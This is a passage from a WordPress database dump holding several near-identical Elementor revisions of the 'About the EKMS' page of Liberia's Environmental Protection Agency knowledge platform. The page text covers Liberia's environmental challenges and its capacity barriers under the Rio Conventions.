exacerbate the situation. Poverty also presents a serious challenge; causing degradation and drawing attention and resources from environmental concerns.  Over 60% of Liberians live in poverty.  Of these, over 40% of citizens live in extreme poverty (Dorliae, 2012).  The outbreak of Ebola in 2014 also threatened Liberia\\u2019s progress, as the crisis became a priority for the government and stretched already limited resources.  Fortunately in January 2016 the outbreak was declared resolved.  Overall, there has been slow progress in sustainable development and meeting obligations under the Rio Conventions.<\\/p> \\n\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"25aa8f3\",\"elType\":\"widget\",\"settings\":{\"title\":\"What does the EKMS include?\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7766\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<!-- wp:paragraph -->\\n<p>The Environmental Knowledge Management System (EKMS) is an integrated online knowledge platform which strive to draw on and complement a growing agenda on the Rio Conventions within the Natural Resource Management Sector and external partners to scale up environmental initiatives.<\\/p>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:paragraph -->\\n<p>The EKMS provides free and open access to information from key government and other institutions in Liberia relating to the implementation of the Rio Conventions \\u2013 The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. The EKMS is deployed under the supervision of Environmental Protection Agency (EPA) in collaboration with twelve relevant government institutions. Information access on this platform include reports, publications, case studies, tools and guidelines, institution\\u2019s technical documents, and other related materials.<\\/p>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:paragraph -->\\n<p>Additionally, the EKMS provides a platform for government institutions and other contributors to share latest blogs, news and stories related to the Rio Conventions implementation process.<\\/p>\\n<!-- \\/wp:paragraph -->\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"51302d0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Acknowledgement\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7a9dbae\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The EPA gratefully acknowledges financial support from the United Nations Development Programme (UNDP) - the Global Environmental Facility (GEF) for the development of this Environmental Knowledge Management System (EKMS).<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"8a1ae94\",\"elType\":\"widget\",\"settings\":{\"title\":\"Disclaimer\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3162138\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Environmental Knowledge Management System (EKMS) provides free and open access to important information from key government and other institutions in Liberia on implementation of the Rio Conventions. The information in the EKMS is provided for informational and educational purposes only. This website contents can not be taken to reflect the views of its sponsors.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(11977,1946,'_elementor_edit_mode','builder'),(11978,1946,'_elementor_template_type','wp-page'),(11979,1946,'_elementor_version','2.7.5'),(11980,1946,'_wp_page_template','default'),(11981,1946,'_elementor_data','[{\"id\":\"2ca8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c9f4c2b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"63c1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9149b81\",\"elType\":\"widget\",\"settings\":{\"title\":\"About the EKMS\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7102f3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"color\":\"rgba(122,122,122,0.36)\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"e346601\",\"elType\":\"widget\",\"settings\":{\"title\":\"Why was the EKMS created?\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"654b3cf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In an effort to bridge knowledge management gaps, the EKMS was created to strengthen institutional coordination between the Environmental Protection Agency (EPA) and other Liberia government institutions as well as Nongovernmental Organizations that have direct linkages with environmental policies and development. It was also created to increase access and dissemination of key information and promote adequate public awareness and education.<\\/p>\\n<p>The EKMS is an output of the Cross-Cutting Capacity Development Project (CCCD). The project funded by the GEF and implemented by the EPA in partnership with the UNDP in collaboration with Natural Resources Management Agencies of Liberia. The project is in line with GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.<\\/p>\\n<h3>Development Challenge<\\/h3>\\n<h4>A1. Global Environmental Challenges<\\/h4>\\n<p>Liberia is located on the southwest coast of Africa, and boarders the Ivory Coast, Guinea, and Sierra Leone. Liberia is divided into 15 counties, which are subdivided into 90 districts. Although Liberia is a rather small country, it has significant biodiversity. There are 600 bird species, 150 mammals, 75 reptiles and over 2000 flowering plants. Some notable species in Liberia include western chimpanzees, forest elephants, and leopards. Liberia also has rich forests; around 42% of the Upper Guinea Forest of West Africa is contained within Liberia (Republic of Liberia, 2014; Republic of Liberia, 2004). Liberia also has numerous natural resources such as timber, rubber, gold diamonds, and iron ore. Economically, the forestry and agriculture sectors are two of the most important sectors in Liberia. Agriculture accounts for over 70% of livelihoods (Dorliae, 2012).<\\/p>\\n<p>Liberia faces numerous environmental challenges including land degradation, fragmentation, deforestation, soil erosion, and pollution. The dependence on forestry presents a unique environmental risk as Liberia\\u2019s forest is part of the West African Hotspot. This (once) rich ecosystem has faced severe deforestation; only ten percent of the original forest remains, of which around 40% lies in Liberia. Unfortunately, this remaining forest is at risk serious risk of deforestation. Over the past two centuries, Liberia has lost over 60% of its forest cover (Republic of Liberia, 2004), and deforestation rates have increased since 2000. Increases in deforestation and land degradation are largely due to displaced people clearing land. Also contributing to deforestation, biodiversity loss, and land degradation is unsustainable farming practices, mining, charcoal production, invasive species, hunting, and unregulated timber extraction. Poaching is also rampant and mitigation measures are lacking; the draft Wildlife Management and Protected Areas Act remains in draft form (Dorliae, 2012).<\\/p>\\n<p>Climate change also poses a real threat to Liberia. Among other threats, Liberia\\u2019s economy and human health could be threatened by rising temperatures and water scarcity. Currently, the country does not have strong capacities for mitigation and adaptation; Liberia has no institutions that offer climate change education or research programs (although, the University of Liberia does offer programs on the environment). Additionally, there are no organized or coordinated programs for meteorological, hydrological, or climate research and observation. Currently, only fragmented services are available. Along with a lack of observation networks, government bodies are hindered by inadequately-trained staff (Environmental Protection Agency of Liberia, 2013).<\\/p>\\n<p>Although aware of the environmental situation, Liberia has struggled to address these environmental issues. The civil wars, which lasted for more than 10 years, served to exacerbate the situation. Poverty also presents a serious challenge; causing degradation and drawing attention and resources from environmental concerns. Over 60% of Liberians live in poverty. Of these, over 40% of citizens live in extreme poverty (Dorliae, 2012). The outbreak of Ebola in 2014 also threatened Liberia\\u2019s progress, as the crisis became a priority for the government and stretched already limited resources. Fortunately in January 2016 the outbreak was declared resolved. Overall, there has been slow progress in sustainable development and meeting obligations under the Rio Conventions.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"25aa8f3\",\"elType\":\"widget\",\"settings\":{\"title\":\"What does the EKMS include?\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7766\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<!-- wp:paragraph -->\\n<p>The Environmental Knowledge Management System (EKMS) is an integrated online knowledge platform which strive to draw on and complement a growing agenda on the Rio Conventions within the Natural Resource Management Sector and external partners to scale up environmental initiatives.<\\/p>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:paragraph -->\\n<p>The EKMS provides free and open access to information from key government and other institutions in Liberia relating to the implementation of the Rio Conventions \\u2013 The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. The EKMS is deployed under the supervision of Environmental Protection Agency (EPA) in collaboration with twelve relevant government institutions. Information access on this platform include reports, publications, case studies, tools and guidelines, institution\\u2019s technical documents, and other related materials.<\\/p>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:paragraph -->\\n<p>Additionally, the EKMS provides a platform for government institutions and other contributors to share latest blogs, news and stories related to the Rio Conventions implementation process.<\\/p>\\n<!-- \\/wp:paragraph -->\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"51302d0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Acknowledgement\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7a9dbae\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The EPA gratefully acknowledges financial support from the United Nations Development Programme (UNDP) - the Global Environmental Facility (GEF) for the development of this Environmental Knowledge Management System (EKMS).<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"8a1ae94\",\"elType\":\"widget\",\"settings\":{\"title\":\"Disclaimer\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3162138\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Environmental Knowledge Management System (EKMS) provides free and open access to important information from key government and other institutions in Liberia on implementation of the Rio Conventions. The information in the EKMS is provided for informational and educational purposes only. This website contents can not be taken to reflect the views of its sponsors.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(11983,1947,'_elementor_edit_mode','builder'),(11984,1947,'_elementor_template_type','wp-page'),(11985,1947,'_elementor_version','2.7.5'),(11986,1947,'_wp_page_template','default'),(11987,1947,'_elementor_data','[{\"id\":\"2ca8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c9f4c2b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"63c1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9149b81\",\"elType\":\"widget\",\"settings\":{\"title\":\"About the EKMS\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7102f3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"color\":\"rgba(122,122,122,0.36)\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"e346601\",\"elType\":\"widget\",\"settings\":{\"title\":\"Why was the EKMS created?\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"654b3cf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In an effort to bridge knowledge management gaps, the EKMS was created to strengthen institutional coordination between the Environmental Protection Agency (EPA) and other Liberia government institutions as well as Nongovernmental Organizations that have direct linkages with environmental policies and development. It was also created to increase access and dissemination of key information and promote adequate public awareness and education.<\\/p>\\n<p>The EKMS is an output of the Cross-Cutting Capacity Development Project (CCCD). The project funded by the GEF and implemented by the EPA in partnership with the UNDP in collaboration with Natural Resources Management Agencies of Liberia. The project is in line with GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.<\\/p>\\n<h3>Development Challenge<\\/h3>\\n<h4>A1. Global Environmental Challenges<\\/h4>\\n<p>Liberia is located on the southwest coast of Africa, and boarders the Ivory Coast, Guinea, and Sierra Leone. Liberia is divided into 15 counties, which are subdivided into 90 districts. Although Liberia is a rather small country, it has significant biodiversity. There are 600 bird species, 150 mammals, 75 reptiles and over 2000 flowering plants. Some notable species in Liberia include western chimpanzees, forest elephants, and leopards. Liberia also has rich forests; around 42% of the Upper Guinea Forest of West Africa is contained within Liberia (Republic of Liberia, 2014; Republic of Liberia, 2004). Liberia also has numerous natural resources such as timber, rubber, gold diamonds, and iron ore. Economically, the forestry and agriculture sectors are two of the most important sectors in Liberia. Agriculture accounts for over 70% of livelihoods (Dorliae, 2012).<\\/p>\\n<p>Liberia faces numerous environmental challenges including land degradation, fragmentation, deforestation, soil erosion, and pollution. The dependence on forestry presents a unique environmental risk as Liberia\\u2019s forest is part of the West African Hotspot. This (once) rich ecosystem has faced severe deforestation; only ten percent of the original forest remains, of which around 40% lies in Liberia. Unfortunately, this remaining forest is at risk serious risk of deforestation. Over the past two centuries, Liberia has lost over 60% of its forest cover (Republic of Liberia, 2004), and deforestation rates have increased since 2000. Increases in deforestation and land degradation are largely due to displaced people clearing land. Also contributing to deforestation, biodiversity loss, and land degradation is unsustainable farming practices, mining, charcoal production, invasive species, hunting, and unregulated timber extraction. Poaching is also rampant and mitigation measures are lacking; the draft Wildlife Management and Protected Areas Act remains in draft form (Dorliae, 2012).<\\/p>\\n<p>Climate change also poses a real threat to Liberia. Among other threats, Liberia\\u2019s economy and human health could be threatened by rising temperatures and water scarcity. Currently, the country does not have strong capacities for mitigation and adaptation; Liberia has no institutions that offer climate change education or research programs (although, the University of Liberia does offer programs on the environment). Additionally, there are no organized or coordinated programs for meteorological, hydrological, or climate research and observation. Currently, only fragmented services are available. Along with a lack of observation networks, government bodies are hindered by inadequately-trained staff (Environmental Protection Agency of Liberia, 2013).<\\/p>\\n<p>Although aware of the environmental situation, Liberia has struggled to address these environmental issues. The civil wars, which lasted for more than 10 years, served to exacerbate the situation. Poverty also presents a serious challenge; causing degradation and drawing attention and resources from environmental concerns. Over 60% of Liberians live in poverty. Of these, over 40% of citizens live in extreme poverty (Dorliae, 2012). The outbreak of Ebola in 2014 also threatened Liberia\\u2019s progress, as the crisis became a priority for the government and stretched already limited resources. Fortunately in January 2016 the outbreak was declared resolved. Overall, there has been slow progress in sustainable development and meeting obligations under the Rio Conventions.<\\/p>\\n<h4>Root Causes<\\/h4><p>There are a few key root causes of environmental degradation in Liberia. The most critical include: human settlements and population pressures; shifting cultivation; timber exploitation; and rubber plantations.  More generally, root causes are related to over-exploitation of biological resources; poverty; political instability and wars; education; and inadequate law enforcement (Republic of Liberia, 2004).  From a reporting perspective, one root cause of Liberia\\u2019s development challenges is the fact that Focal Points are located in different agencies, which thereby limits coordination and collaboration between them.<\\/p><h4>A2. Capacity Barriers<\\/h4><p>Liberia has undertaken numerous initiatives to address environmental issues.  Despite the achievements Liberia made, Liberia continues to face important challenges to meeting environmental goals.  As a Rio Convention mainstreaming project, the proposed strategy sets out to meet barriers identified in Liberia\\u2019s 2006 National Capacity Self-Assessment (NCSA), which was undertaken though a consultative process and participatory approach that involved numerous stakeholders from various sectors.   Through the inclusive and consultative process of the NCSA, stakeholders identified a number of areas that explain the difficulty in fulfilling the obligations of the Rio Conventions.  The NCSA identified the following barriers that cut across the three Rio Conventions:<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"25aa8f3\",\"elType\":\"widget\",\"settings\":{\"title\":\"What does the EKMS include?\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7766\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<!-- wp:paragraph -->\\n<p>The Environmental Knowledge Management System (EKMS) is an integrated online knowledge platform which strive to draw on and complement a growing agenda on the Rio Conventions within the Natural Resource Management Sector and external partners to scale up environmental initiatives.<\\/p>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:paragraph -->\\n<p>The EKMS provides free and open access to information from key government and other institutions in Liberia relating to the implementation of the Rio Conventions \\u2013 The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. The EKMS is deployed under the supervision of Environmental Protection Agency (EPA) in collaboration with twelve relevant government institutions. Information access on this platform include reports, publications, case studies, tools and guidelines, institution\\u2019s technical documents, and other related materials.<\\/p>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:paragraph -->\\n<p>Additionally, the EKMS provides a platform for government institutions and other contributors to share latest blogs, news and stories related to the Rio Conventions implementation process.<\\/p>\\n<!-- \\/wp:paragraph -->\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"51302d0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Acknowledgement\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7a9dbae\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The EPA gratefully acknowledges financial support from the United Nations Development Programme (UNDP) - the Global Environmental Facility (GEF) for the development of this Environmental Knowledge Management System (EKMS).<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"8a1ae94\",\"elType\":\"widget\",\"settings\":{\"title\":\"Disclaimer\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3162138\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Environmental Knowledge Management System (EKMS) provides free and open access to important information from key government and other institutions in Liberia on implementation of the Rio Conventions. The information in the EKMS is provided for informational and educational purposes only. This website contents can not be taken to reflect the views of its sponsors.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(11989,1948,'_elementor_edit_mode','builder'),(11990,1948,'_elementor_template_type','wp-page'),(11991,1948,'_elementor_version','2.7.5'),(11992,1948,'_wp_page_template','default'),(11993,1948,'_elementor_data','[{\"id\":\"2ca8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c9f4c2b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"63c1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9149b81\",\"elType\":\"widget\",\"settings\":{\"title\":\"About the EKMS\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7102f3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"color\":\"rgba(122,122,122,0.36)\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"e346601\",\"elType\":\"widget\",\"settings\":{\"title\":\"Why was the EKMS created?\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"654b3cf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In an effort to bridge knowledge management gaps, the EKMS was created to strengthen institutional coordination between the Environmental Protection Agency (EPA) and other Liberia government institutions as well as Nongovernmental Organizations that have direct linkages with environmental policies and development. It was also created to increase access and dissemination of key information and promote adequate public awareness and education.<\\/p>\\n<p>The EKMS is an output of the Cross-Cutting Capacity Development Project (CCCD). The project funded by the GEF and implemented by the EPA in partnership with the UNDP in collaboration with Natural Resources Management Agencies of Liberia. The project is in line with GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.<\\/p>\\n<h3>Development Challenge<\\/h3>\\n<h4>A1. Global Environmental Challenges<\\/h4>\\n<p>Liberia is located on the southwest coast of Africa, and boarders the Ivory Coast, Guinea, and Sierra Leone. Liberia is divided into 15 counties, which are subdivided into 90 districts. Although Liberia is a rather small country, it has significant biodiversity. There are 600 bird species, 150 mammals, 75 reptiles and over 2000 flowering plants. Some notable species in Liberia include western chimpanzees, forest elephants, and leopards. Liberia also has rich forests; around 42% of the Upper Guinea Forest of West Africa is contained within Liberia (Republic of Liberia, 2014; Republic of Liberia, 2004). Liberia also has numerous natural resources such as timber, rubber, gold diamonds, and iron ore. Economically, the forestry and agriculture sectors are two of the most important sectors in Liberia. Agriculture accounts for over 70% of livelihoods (Dorliae, 2012).<\\/p>\\n<p>Liberia faces numerous environmental challenges including land degradation, fragmentation, deforestation, soil erosion, and pollution. The dependence on forestry presents a unique environmental risk as Liberia\\u2019s forest is part of the West African Hotspot. This (once) rich ecosystem has faced severe deforestation; only ten percent of the original forest remains, of which around 40% lies in Liberia. Unfortunately, this remaining forest is at risk serious risk of deforestation. Over the past two centuries, Liberia has lost over 60% of its forest cover (Republic of Liberia, 2004), and deforestation rates have increased since 2000. Increases in deforestation and land degradation are largely due to displaced people clearing land. Also contributing to deforestation, biodiversity loss, and land degradation is unsustainable farming practices, mining, charcoal production, invasive species, hunting, and unregulated timber extraction. Poaching is also rampant and mitigation measures are lacking; the draft Wildlife Management and Protected Areas Act remains in draft form (Dorliae, 2012).<\\/p>\\n<p>Climate change also poses a real threat to Liberia. Among other threats, Liberia\\u2019s economy and human health could be threatened by rising temperatures and water scarcity. Currently, the country does not have strong capacities for mitigation and adaptation; Liberia has no institutions that offer climate change education or research programs (although, the University of Liberia does offer programs on the environment). Additionally, there are no organized or coordinated programs for meteorological, hydrological, or climate research and observation. Currently, only fragmented services are available. Along with a lack of observation networks, government bodies are hindered by inadequately-trained staff (Environmental Protection Agency of Liberia, 2013).<\\/p>\\n<p>Although aware of the environmental situation, Liberia has struggled to address these environmental issues. The civil wars, which lasted for more than 10 years, served to exacerbate the situation. Poverty also presents a serious challenge; causing degradation and drawing attention and resources from environmental concerns. Over 60% of Liberians live in poverty. Of these, over 40% of citizens live in extreme poverty (Dorliae, 2012). The outbreak of Ebola in 2014 also threatened Liberia\\u2019s progress, as the crisis became a priority for the government and stretched already limited resources. Fortunately in January 2016 the outbreak was declared resolved. Overall, there has been slow progress in sustainable development and meeting obligations under the Rio Conventions.<\\/p>\\n<h4>Root Causes<\\/h4>\\n<p>There are a few key root causes of environmental degradation in Liberia. The most critical include: human settlements and population pressures; shifting cultivation; timber exploitation; and rubber plantations. More generally, root causes are related to over-exploitation of biological resources; poverty; political instability and wars; education; and inadequate law enforcement (Republic of Liberia, 2004). From a reporting perspective, one root cause of Liberia\\u2019s development challenges is the fact that Focal Points are located in different agencies, which thereby limits coordination and collaboration between them.<\\/p>\\n<h4>A2. Capacity Barriers<\\/h4>\\n<p>Liberia has undertaken numerous initiatives to address environmental issues. Despite the achievements Liberia made, Liberia continues to face important challenges to meeting environmental goals. As a Rio Convention mainstreaming project, the proposed strategy sets out to meet barriers identified in Liberia\\u2019s 2006 National Capacity Self-Assessment (NCSA), which was undertaken though a consultative process and participatory approach that involved numerous stakeholders from various sectors. Through the inclusive and consultative process of the NCSA, stakeholders identified a number of areas that explain the difficulty in fulfilling the obligations of the Rio Conventions. The NCSA identified the following barriers that cut across the three Rio Conventions:<\\/p>\\n<ul>\\n<li>Inadequate public awareness and education\\/training<\\/li>\\n<li>Inadequate institutions and institutional frameworks<\\/li>\\n<li>Inadequate political commitment<\\/li>\\n<li>Inadequate planning skills and resources, as well as incomplete structures at all levels of policy implementation<\\/li>\\n<li>Inadequate financial resources and economic framework<\\/li>\\n<li>Inadequate strategic plans and implementation<\\/li>\\n<li>Inadequate access to information<\\/li>\\n<li>Inadequate policies and legal frameworks<\\/li>\\n<li>Low level of involvement of civil society<\\/li>\\n<li>Inadequate natural resources management systems<\\/li>\\n<li>Lack of institutional capacities<\\/li>\\n<li>Lack of effective mechanism for information processing and sharing<\\/li>\\n<li>Poor governance<\\/li>\\n<\\/ul>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"25aa8f3\",\"elType\":\"widget\",\"settings\":{\"title\":\"What does the EKMS include?\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7766\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<!-- wp:paragraph -->\\n<p>The Environmental Knowledge Management System (EKMS) is an integrated online knowledge platform which strive to draw on and complement a growing agenda on the Rio Conventions within the Natural Resource Management Sector and external partners to scale up environmental initiatives.<\\/p>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:paragraph -->\\n<p>The EKMS provides free and open access to information from key government and other institutions in Liberia relating to the implementation of the Rio Conventions \\u2013 The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. The EKMS is deployed under the supervision of Environmental Protection Agency (EPA) in collaboration with twelve relevant government institutions. Information access on this platform include reports, publications, case studies, tools and guidelines, institution\\u2019s technical documents, and other related materials.<\\/p>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:paragraph -->\\n<p>Additionally, the EKMS provides a platform for government institutions and other contributors to share latest blogs, news and stories related to the Rio Conventions implementation process.<\\/p>\\n<!-- \\/wp:paragraph -->\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"51302d0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Acknowledgement\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7a9dbae\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The EPA gratefully acknowledges financial support from the United Nations Development Programme (UNDP) - the Global Environmental Facility (GEF) for the development of this Environmental Knowledge Management System (EKMS).<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"8a1ae94\",\"elType\":\"widget\",\"settings\":{\"title\":\"Disclaimer\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3162138\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Environmental Knowledge Management System (EKMS) provides free and open access to important information from key government and other institutions in Liberia on implementation of the Rio Conventions. The information in the EKMS is provided for informational and educational purposes only. This website contents can not be taken to reflect the views of its sponsors.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(11995,1949,'_elementor_edit_mode','builder'),(11996,1949,'_elementor_template_type','wp-page'),(11997,1949,'_elementor_version','2.7.5'),(11998,1949,'_wp_page_template','default'),(11999,1949,'_elementor_data','[{\"id\":\"2ca8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c9f4c2b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"63c1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9149b81\",\"elType\":\"widget\",\"settings\":{\"title\":\"About the EKMS\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7102f3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"color\":\"rgba(122,122,122,0.36)\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"e346601\",\"elType\":\"widget\",\"settings\":{\"title\":\"Why was the EKMS 